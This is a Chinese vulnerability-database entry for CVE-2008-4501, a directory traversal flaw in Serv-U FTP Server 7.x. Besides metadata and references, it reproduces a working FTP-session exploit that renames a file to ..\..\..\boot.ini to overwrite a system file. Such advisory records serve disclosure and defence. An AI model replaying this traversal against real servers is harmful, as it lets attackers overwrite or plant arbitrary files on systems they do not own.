Serv-U FTP服务器目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116328 漏洞类型 路径遍历
发布时间 2008-10-03 更新时间 2008-10-08
CVE编号 CVE-2008-4501 CNNVD-ID CNNVD-200810-127
漏洞平台 Windows CVSS评分 9.0
|漏洞来源
https://www.exploit-db.com/exploits/6661
https://www.securityfocus.com/bid/84767
https://cxsecurity.com/issue/WLB-2008100136
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-127
|漏洞详情
Serv-U7.0.0.1至7.3,包括7.2.0.1版本的FTP服务器中存在目录遍历漏洞。远程认证用户可借助RNTO命令中的..\(点点反斜线)覆盖或创建任意文件。
|漏洞EXP
#Serv-U <= 7.2.0.1 / 7.3 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited

# milw0rm.com [2008-10-03]
|参考资料

来源:VUPEN
名称:ADV-2008-2746
链接:http://www.frsirt.com/english/advisories/2008/2746
来源:MILW0RM
名称:6661
链接:http://www.milw0rm.com/exploits/6661
来源:SREASON
名称:4378
链接:http://securityreason.com/securityalert/4378
来源:SECUNIA
名称:32150
链接:http://secunia.com/advisories/32150